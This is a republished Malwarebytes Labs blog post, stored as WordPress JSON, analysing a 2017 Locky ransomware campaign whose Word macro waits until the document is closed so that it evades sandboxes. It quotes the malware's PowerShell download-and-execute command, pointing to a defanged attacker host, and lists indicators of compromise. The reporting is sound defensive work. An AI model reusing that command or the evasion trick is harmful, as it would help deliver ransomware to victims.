{"id":9033,"date":"2017-08-31T09:10:06","date_gmt":"2017-08-31T17:10:06","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/08\/31\/news-2806\/"},"modified":"2017-08-31T09:10:06","modified_gmt":"2017-08-31T17:10:06","slug":"news-2806","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/08\/31\/news-2806\/","title":{"rendered":"Locky ransomware adds anti sandbox feature"},"content":{"rendered":"

Credit to Author: Malwarebytes Labs| Date: Thu, 31 Aug 2017 16:09:39 +0000<\/strong><\/p>\n

By Marcelo Rivero and J\u00e9r\u00f4me Segura<\/em><\/p>\n

The Locky ransomware has been very active since its return which we documented in a previous blog post<\/a>.\u00a0There are several different Locky campaigns going on at the same time, the largest being the one from affiliate ID 3 which comes with malicious ZIP containing .VBS or .JS attachments.<\/p>\n

Malwarebytes researcher Marcelo Rivero discovered<\/a> a trick[1] employed by Locky’s affiliate ID 5\u00a0to bypass automated analysis done via sandboxes.<\/p>\n

Malware authors have used booby trapped Office documents containing macros to retrieve their payloads for some time, but ordinarily the code executes as soon as the user clicks the ‘Enable Content’ button. For analysis purposes, many sandboxes lower the security settings of various applications and enable macros by default, which allows for the automated capture of the malicious payload.<\/p>\n

Strikes when you least expect it<\/h2>\n

However, this particular Locky campaign no longer simply triggers by running the macro itself, but waits until the fake Word document is closed by the user before it starts to invoke a set of commands.<\/p>\n

\"\"<\/a><\/p>\n

\"\"<\/a><\/p>\n

“C:WindowsSystem32WindowsPowerShellv1.0powershell.exe” -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile(‘http:\/\/newhostrcm[.]top\/admin.php?f=1’, $env:APPDATA + ‘sATTfJY.exe’); Start-Process $env:APPDATA’sATTfJY.exe’;<\/em><\/p>\n

The payload is downloaded and launched from the %appdata% folder followed by the typical ransom note:<\/p>\n

\"\"<\/a><\/p>\n

Implications<\/h2>\n

While not a sophisticated technique, it nonetheless illustrates the constant cat and mouse battle between attackers and defenders. We ascertain that in their current form, the malicious documents are likely to exhibit a harmless behavior in many sandboxes while still infecting end users that would logically close the file when they realize there is nothing to be seen.<\/p>\n

Malwarebytes<\/a> blocks this attack at several different layers and is not impacted by this ‘closing the document’ trick.<\/p>\n

\"\"<\/p>\n

Indicators of compromise:<\/h2>\n

Word document:<\/p>\n

b613b1c80b27fb21cfc95fb9cd59b4bb64c9fda0651d5ca05b0b50f76b04c9f4<\/pre>\n
Locky:<\/p>\n
newhostrcm[.]top\/admin.php?f=1  47.89.250.152  7cdcb878bf9bf5bb48a0034b04969c74401b25a516078ffd7f721d8098b2a774  <\/pre>\n
References<\/h2>\n
[1] https:\/\/www.proofpoint.com\/us\/threat-insight\/post\/Run-on-Close-Macros-Try-to-Shut-the-Door-on-Sandboxes<\/a><\/p>\n
The post Locky ransomware adds anti sandbox feature<\/a> appeared first on Malwarebytes Labs<\/a>.<\/p>\n
https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Credit to Author: Malwarebytes Labs| Date: Thu, 31 Aug 2017 16:09:39 +0000<\/strong><\/p>\n\n\n\n
<\/a><\/td>\n<\/tr>\n
Locky attempts to evade detection by relying once more on simply, yet effective user interaction.<\/p>\n
Categories: <\/p>\n